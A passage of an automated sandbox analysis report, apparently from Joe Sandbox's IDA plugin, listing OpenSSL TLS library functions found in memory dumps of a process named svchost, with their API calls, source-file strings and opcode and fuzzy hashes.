                                                                                                • Part of subcall function 00007FFBAB443520: ERR_new.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB44364F
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_set_debug.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB443667
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_set_error.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB443678
                                                                                                • Part of subcall function 00007FFBAB443520: OSSL_PARAM_construct_octet_string.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB44372C
                                                                                                • Part of subcall function 00007FFBAB443520: OSSL_PARAM_construct_octet_string.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB44375E
                                                                                                • Part of subcall function 00007FFBAB443520: OSSL_PARAM_construct_octet_string.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB443797
                                                                                                • Part of subcall function 00007FFBAB443520: OSSL_PARAM_construct_end.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4437BE
                                                                                              • EVP_MD_CTX_free.LIBCRYPTO-3-X64 ref: 00007FFBAB442B68
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                               • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                               • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Digest$M_construct_octet_stringX_free$Final_exInit_exR_newR_set_debugR_set_error$D_get0_nameF_freeM_construct_endUpdateX_new
                                                                                              • String ID: exporter
                                                                                              APIs
                                                                                              • EVP_MD_get_size.LIBCRYPTO-3-X64 ref: 00007FFBAB416176
                                                                                              • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFBAB4161FC
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFBAB41620A
                                                                                                • Part of subcall function 00007FFBAB4719B0: ERR_new.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFBAB47009E,?,00000000,000004A0), ref: 00007FFBAB471B14
                                                                                                • Part of subcall function 00007FFBAB4719B0: ERR_set_debug.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFBAB47009E,?,00000000,000004A0), ref: 00007FFBAB471B2C
                                                                                                • Part of subcall function 00007FFBAB4719B0: ERR_set_error.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFBAB47009E,?,00000000,000004A0), ref: 00007FFBAB471B3D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$D_get_sizeR_set_error
                                                                                              • String ID: ssl3_change_cipher_state$ssl\s3_enc.c$u
                                                                                              • API String ID: 1223758721-1779087871
                                                                                              • Opcode ID: 70e912de66dbf58922ecb734d36fe2215cb4350b4c20fc56dcf644421a8ca58e
                                                                                              • Instruction ID: b29a6b3eaa25922f6a4d2e5d375a63eee91f3b60704f95d16cda7ed19191dcf0
                                                                                              • Opcode Fuzzy Hash: 70e912de66dbf58922ecb734d36fe2215cb4350b4c20fc56dcf644421a8ca58e
                                                                                              • Instruction Fuzzy Hash: E341C1B2A0AA4181E621DB26F8456BE73A8FB88B80F548136DF9D43B65DF3CD546C700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newmemcpy$R_set_debug
                                                                                              • String ID: CLIENT_RANDOM$ssl\statem\statem_lib.c$tls_construct_finished
                                                                                              • API String ID: 3909032045-44254327
                                                                                              • Opcode ID: 2ba7dd0ee7205c1b6e8c25e3da90c80019bc56a77d4ef2b527cd34628bd4a920
                                                                                              • Instruction ID: 4300048703de16188455eeea0c4e5333ce89a90844741af02faf0ad66d44ce3d
                                                                                              • Opcode Fuzzy Hash: 2ba7dd0ee7205c1b6e8c25e3da90c80019bc56a77d4ef2b527cd34628bd4a920
                                                                                              • Instruction Fuzzy Hash: 205197B2A0A68281EBA2DF35D4D47FD23A4EB44B88F148036DE5D476A5DF39E485C390
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_padding
                                                                                              • API String ID: 193678381-1618130649
                                                                                              • Opcode ID: 1f5e9d3c769b1e08d8cfc1214b8d5ceef8da802e931fc7541ffb154937d8c312
                                                                                              • Instruction ID: 4848ce13f9673bea15275c4c37c57ed4dd24a7024e5aff55b4ce48401f261e8d
                                                                                              • Opcode Fuzzy Hash: 1f5e9d3c769b1e08d8cfc1214b8d5ceef8da802e931fc7541ffb154937d8c312
                                                                                              • Instruction Fuzzy Hash: 3141A1A2B0A64282EB529736E4813BD63A4EF85B94F188531DF6C477E6DE2DD581C700
                                                                                              APIs
                                                                                              • BUF_MEM_grow_clean.LIBCRYPTO-3-X64(?,00007FFBAB491816,?,?,?,?,?,00007FFBAB491D76,00000000,?,?,?,?,?,00000000,00007FFBAB491AED), ref: 00007FFBAB490C90
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB491816,?,?,?,?,?,00007FFBAB491D76,00000000,?,?,?,?,?,00000000,00007FFBAB491AED), ref: 00007FFBAB490C9A
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB491816,?,?,?,?,?,00007FFBAB491D76,00000000,?,?,?,?,?,00000000,00007FFBAB491AED), ref: 00007FFBAB490CB2
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB491816,?,?,?,?,?,00007FFBAB491D76,00000000,?,?,?,?,?,00000000,00007FFBAB491AED), ref: 00007FFBAB490D25
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB491816,?,?,?,?,?,00007FFBAB491D76,00000000,?,?,?,?,?,00000000,00007FFBAB491AED), ref: 00007FFBAB490D31
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB491816,?,?,?,?,?,00007FFBAB491D76,00000000,?,?,?,?,?,00000000,00007FFBAB491AED), ref: 00007FFBAB490D49
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$M_grow_clean
                                                                                              • String ID: dtls1_preprocess_fragment$ssl\statem\statem_dtls.c
                                                                                              • API String ID: 3867660093-338339041
                                                                                              • Opcode ID: 57e514b6f8a84391c9b50a7fae2513a6fb5404a5aa9860a2d17937c9f84f7181
                                                                                              • Instruction ID: 4d4d48bf19237fdec99d016fe9adfe4c8de81051f9fdf664dd6f5c5e1ca9db3d
                                                                                              • Opcode Fuzzy Hash: 57e514b6f8a84391c9b50a7fae2513a6fb5404a5aa9860a2d17937c9f84f7181
                                                                                              • Instruction Fuzzy Hash: 6431A4B2B0A68185E752DB75D4913BD2760FB48B84F488532DFAC477A6CF3CE5868700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_pushR_newR_set_debugR_set_errormemcpy
                                                                                              • String ID: P$ciphersuite_cb$ssl\ssl_ciph.c
                                                                                              • API String ID: 69574139-1019853614
                                                                                              • Opcode ID: 261f1c169834f3b248e3fcf4ba54e383dab0ddf77f8d43070ce3eaaf034a2cc3
                                                                                              • Instruction ID: 2c4a0a240721f57cc93091e9fa031a925783edc0bfd13c8a9fa17e57e0690e98
                                                                                              • Opcode Fuzzy Hash: 261f1c169834f3b248e3fcf4ba54e383dab0ddf77f8d43070ce3eaaf034a2cc3
                                                                                              • Instruction Fuzzy Hash: AA11B4E1F4E54292FA62A735E8873BE5351AF48784F50C536ED6C427F6EE2CE5088700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$memcmp
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_parse_ctos_renegotiate
                                                                                              • API String ID: 4071200903-75546675
                                                                                              • Opcode ID: 4e429b41bcfbe82b30b0e688d5619eabcadb87baebd6f48d83b1b1b919c85ab4
                                                                                              • Instruction ID: 58dc67bc9726b1aefc7556430ce05061384d5f1b400bb0ee869c0b028c7edc0c
                                                                                              • Opcode Fuzzy Hash: 4e429b41bcfbe82b30b0e688d5619eabcadb87baebd6f48d83b1b1b919c85ab4
                                                                                              • Instruction Fuzzy Hash: 352180E1B4B68291FB929BB1E8523B81350EB44B80F54C432DE2D477A2DE3CE9D58310
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_new_nullL_sk_pushR_newR_set_debugR_set_errorX509_up_ref
                                                                                              • String ID: ssl\ssl_cert.c$ssl_cert_add0_chain_cert
                                                                                              • API String ID: 3689422639-2634322016
                                                                                              • Opcode ID: 44b6193324a3d4cf3e721394ce85266bc517458d67d2a7f9dc9f744984ca31a1
                                                                                              • Instruction ID: 243c9a6bf0ed503dedde43a2440a4bc1133e5be809bdfb7d604acd2d89e796a3
                                                                                              • Opcode Fuzzy Hash: 44b6193324a3d4cf3e721394ce85266bc517458d67d2a7f9dc9f744984ca31a1
                                                                                              • Instruction Fuzzy Hash: 8F1193A1F0F65281FA57DB31E8523BD6290EF44BC4F188432DE2D477A6DE2CE8458700
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB429B10,?,00007FFBAB412E95), ref: 00007FFBAB42C38E
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB429B10,?,00007FFBAB412E95), ref: 00007FFBAB42C3A6
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,00007FFBAB429B10,?,00007FFBAB412E95), ref: 00007FFBAB42C3B7
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB429B10,?,00007FFBAB412E95), ref: 00007FFBAB42C3D0
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB429B10,?,00007FFBAB412E95), ref: 00007FFBAB42C3E8
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,00007FFBAB429B10,?,00007FFBAB412E95), ref: 00007FFBAB42C3F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: can_renegotiate$ssl\ssl_lib.c
                                                                                              • API String ID: 1552677711-867855671
                                                                                              • Opcode ID: 3a1675180e72825a1a9c0467388758be2d6c99f26fcfcb73c7b2ad0611180d60
                                                                                              • Instruction ID: f68b2c463b98bc7d5c3d8f77602f143909f492f838fc99bd6b736600a5d7c18e
                                                                                              • Opcode Fuzzy Hash: 3a1675180e72825a1a9c0467388758be2d6c99f26fcfcb73c7b2ad0611180d60
                                                                                              • Instruction Fuzzy Hash: B2111BA2A4A54282F796E736C8827FD2351EB50740F909435DD2C826F2DE2CE59A9601
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$Crypto
                                                                                              • API String ID: 3964688267-430340682
                                                                                              • Opcode ID: a599dc20fec591ff140dff86ef44d1bb6b4f5833528ccddc5ea2a086fa4e5926
                                                                                              • Instruction ID: ab69667562d7a909dd00c414538e52e8ec907af27231532dfc0d314d597b8598
                                                                                              • Opcode Fuzzy Hash: a599dc20fec591ff140dff86ef44d1bb6b4f5833528ccddc5ea2a086fa4e5926
                                                                                              • Instruction Fuzzy Hash: 4F015AE1A4A65380FE26DB75E8513FD1750AF45794F449036DE2E072A6DE3CE0868200
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ App Protocol Error Code: %llu$ Stream id: %llu$Stop sending
                                                                                              • API String ID: 3964688267-1785104151
                                                                                              • Opcode ID: 8554a91a66266b5c025effea9843182e4f2e52f216936860ac81f87ff0741d91
                                                                                              • Instruction ID: 9ed93efcd590c460aa28d21e48070c5186a0e3df5efaa0c5c46accef2d82c332
                                                                                              • Opcode Fuzzy Hash: 8554a91a66266b5c025effea9843182e4f2e52f216936860ac81f87ff0741d91
                                                                                              • Instruction Fuzzy Hash: 67012CE1E4A64390FE26DB75E8613FD1760AF45794F449036DE2E472A5DE3CE1868300
                                                                                              APIs
                                                                                              • ERR_peek_last_error.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB44F9FC), ref: 00007FFBAB45E63C
                                                                                              • ERR_pop_to_mark.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB44F9FC), ref: 00007FFBAB45E64C
                                                                                              • ERR_clear_last_mark.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB44F9FC), ref: 00007FFBAB45E653
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_clear_last_markR_peek_last_errorR_pop_to_mark
                                                                                              • String ID:
                                                                                              • API String ID: 4503806-0
                                                                                              • Opcode ID: 1653e883ae788b22098aff78b098f66b5393b0d98448a3d5c585c9e523f4069e
                                                                                              • Instruction ID: cb69f4b31d75c754e6bab0a758118b578079749dbfaee3efc980aaee292f7e94
                                                                                              • Opcode Fuzzy Hash: 1653e883ae788b22098aff78b098f66b5393b0d98448a3d5c585c9e523f4069e
                                                                                              • Instruction Fuzzy Hash: 5E511962B4AF8582E661DB25E84067E73A4FF49B84F448235EE7D437A9EF38D805C700
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: EventHandleInformation
                                                                                              • String ID:
                                                                                              • API String ID: 943243487-0
                                                                                              • Opcode ID: 0abebdb6bbe18b6591d2f169ee2d49ccc49482f9618223d758f2abb39a9272bf
                                                                                              • Instruction ID: c02d53f5b47e4eab209d974f5deb7cec8a0e804993d913822503880e7c3ff0c7
                                                                                              • Opcode Fuzzy Hash: 0abebdb6bbe18b6591d2f169ee2d49ccc49482f9618223d758f2abb39a9272bf
                                                                                              • Instruction Fuzzy Hash: 1C41B232682640CAEB55CF75D8003696B65EB86FBCF144225CF2E8B395EF39C145C710
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
                                                                                              • String ID:
                                                                                              • API String ID: 2941551293-0
                                                                                              • Opcode ID: 41f481ae3904839b845b6b966e47d7c0d9084ec4171bca2e1ba02052f09d8d33
                                                                                              • Instruction ID: 9b255bf73e60d4f51aa72ff79eaf3e3afad282202bf316635f7d93ce8b392ba6
                                                                                              • Opcode Fuzzy Hash: 41f481ae3904839b845b6b966e47d7c0d9084ec4171bca2e1ba02052f09d8d33
                                                                                              • Instruction Fuzzy Hash: C441B0353D664086FB09DFB0F86036933AAFB85B6CF454525CE0A42794EF39C495CB61
                                                                                              APIs
                                                                                              • TlsGetValue.KERNEL32 ref: 6494457C
                                                                                                • Part of subcall function 649444D0: __iob_func.MSVCRT ref: 64944501
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value__iob_func
                                                                                              • String ID:
                                                                                              • API String ID: 2820842585-0
                                                                                              • Opcode ID: 0546eda2f010a2ff3f3b1f8a39091f3d6a25e4e9caee43d900f00acf19f6acdb
                                                                                              • Instruction ID: 16148a25f4b476eea67aa2965a04ab47484b3a23098f2b50d2a6f1ecfa518ab3
                                                                                              • Opcode Fuzzy Hash: 0546eda2f010a2ff3f3b1f8a39091f3d6a25e4e9caee43d900f00acf19f6acdb
                                                                                              • Instruction Fuzzy Hash: 62316F716916408BFB259F71F80835B77A5F709BA8F140229CEAA477A0DF3DD059CB20
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFBAB47C75A), ref: 00007FFBAB482281
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFBAB47C75A), ref: 00007FFBAB482299
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFBAB47C75A), ref: 00007FFBAB4822ED
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFBAB47C75A), ref: 00007FFBAB482329
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFBAB47C75A), ref: 00007FFBAB482341
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug
                                                                                              • String ID: custom_ext_add$ssl\statem\extensions_cust.c
                                                                                              • API String ID: 476316267-2598430110
                                                                                              • Opcode ID: 848f00409a266f594c879187554ee4d88aa2be5f85c54d266ad7c43225f7afad
                                                                                              • Instruction ID: a759c5150b031b84bc21c3f57d9a75e55366dca9658a6f96ba4e3d529ba0ff75
